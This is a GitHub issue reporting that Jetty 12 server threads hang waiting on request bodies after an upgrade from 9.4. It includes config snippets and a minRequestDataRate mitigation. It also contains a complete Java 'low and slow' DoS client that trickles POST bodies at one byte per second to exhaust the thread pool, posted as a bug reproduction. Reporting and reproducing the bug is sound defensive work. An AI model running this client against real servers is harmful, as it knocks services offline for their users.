Jetty threads stuck on BlockingContentProvider.nextContent #12434
Comments
Do you have a complete project for this?
Yes, that's happening with one of our services. We are using Jersey 2.43. We did upgrade it from 2.39 when we moved to Jetty 12.
Jetty version(s)
12.0.13
Jetty Environment
ee8
Java version/vendor
21.0.4.7.1/AWS (Corretto)
OS type/version
Ubuntu/22.04
Description
After migrating our application from Jetty 9.4 to 12, we've encountered an issue with hung Jetty thread pool threads. We're not using virtual threads, and we've ensured that no thread pool queue limit is set, as per the documentation.
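For context, our thread pool setup amounts to the following; this is a minimal embedded-Jetty sketch using the standard QueuedThreadPool API, and the pool sizes here are illustrative rather than our exact values:

```java
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.util.thread.QueuedThreadPool;

public class ServerSetup {
    public static void main(String[] args) throws Exception {
        // maxThreads/minThreads are set explicitly; the job queue is left at its
        // default, which is unbounded, i.e. no queue limit is configured.
        QueuedThreadPool threadPool = new QueuedThreadPool(200, 8);
        Server server = new Server(threadPool);
        // ... connectors and handlers omitted ...
        server.start();
        server.join();
    }
}
```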
The problem manifests as Jetty becoming unresponsive, requiring pod recycling to resolve. While the exact trigger is unknown, it may be related to cloud provider network issues or sudden traffic surges.
Thread dumps from affected instances reveal most threads in a WAITING state on HttpInput.read(), specifically blocked in BlockingContentProvider.nextContent() when attempting to read request bodies. Here is a similar issue.
We successfully replicated this state using a "low and slow" DoS attack: establishing connections to the Jetty instance and sending data at an extremely slow rate (1 byte per second). In Jetty 9.4, threads recover once the attack stops, but in Jetty 12 they remain stuck indefinitely, necessitating an application restart. This behavior suggests a potential regression introduced between versions 9.4 and 12.
Our investigation led us to the undocumented minRequestDataRate property. Setting it to 50 prevented the issue in our test environment. However, this configuration may be unreliable, since JIT and GC pauses could make legitimate connections momentarily fall below the threshold.
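For reference, a minimal sketch of how this can be applied in embedded Jetty, assuming the standard HttpConfiguration.setMinRequestDataRate() API; the port is illustrative, and 50 bytes/second is the value from our test environment:

```java
import org.eclipse.jetty.server.HttpConfiguration;
import org.eclipse.jetty.server.HttpConnectionFactory;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.server.ServerConnector;

public class MinRateServer {
    public static void main(String[] args) throws Exception {
        Server server = new Server();

        HttpConfiguration httpConfig = new HttpConfiguration();
        // Abort requests whose body arrives slower than 50 bytes/second.
        httpConfig.setMinRequestDataRate(50);

        ServerConnector connector = new ServerConnector(server, new HttpConnectionFactory(httpConfig));
        connector.setPort(8080);
        server.addConnector(connector);

        server.start();
        server.join();
    }
}
```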
While the test environment issue and the production problem seem to share an underlying cause, we cannot confirm that the same "low and slow" scenario occurs in production. Consequently, we're uncertain whether applying the minRequestDataRate setting will resolve the issue in our production environment.
We seek guidance on identifying the root cause of this behavior change between Jetty versions and on determining an appropriate solution.
Jetty server dump - jetty_dump.txt
An example of a stuck thread (from thread dump):
How to reproduce?
Use a "low and slow" DoS attack against a Jetty-based application where the number of concurrent requests exceeds jetty.threadPool.maxThreads. A sample Java client is sketched below.
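A minimal sketch of such a client, using plain java.net.Socket; the host, port, request target, and connection count are illustrative and not taken verbatim from our original sample:

```java
import java.io.OutputStream;
import java.net.Socket;
import java.util.ArrayList;
import java.util.List;

public class LowAndSlowClient {
    // Hypothetical target; point this at the Jetty instance under test.
    private static final String HOST = "localhost";
    private static final int PORT = 8080;
    // Open more connections than jetty.threadPool.maxThreads.
    private static final int CONNECTIONS = 300;

    public static void main(String[] args) throws Exception {
        List<Thread> threads = new ArrayList<>();
        for (int i = 0; i < CONNECTIONS; i++) {
            Thread t = new Thread(LowAndSlowClient::slowPost);
            t.start();
            threads.add(t);
        }
        for (Thread t : threads) {
            t.join();
        }
    }

    private static void slowPost() {
        try (Socket socket = new Socket(HOST, PORT)) {
            OutputStream out = socket.getOutputStream();
            // Declare a large body so the server blocks waiting to read it.
            out.write(("POST /test HTTP/1.1\r\n" +
                       "Host: " + HOST + "\r\n" +
                       "Content-Type: application/octet-stream\r\n" +
                       "Content-Length: 1000000\r\n" +
                       "\r\n").getBytes());
            out.flush();
            // Trickle the body at roughly 1 byte per second.
            for (int i = 0; i < 1_000_000; i++) {
                out.write('x');
                out.flush();
                Thread.sleep(1000);
            }
        } catch (Exception e) {
            // A reset or closed connection is expected once server limits kick in.
        }
    }
}
```

Each connection declares a large Content-Length and then sends the body at about 1 byte per second, which is enough to keep a server thread blocked reading the request body, as described above.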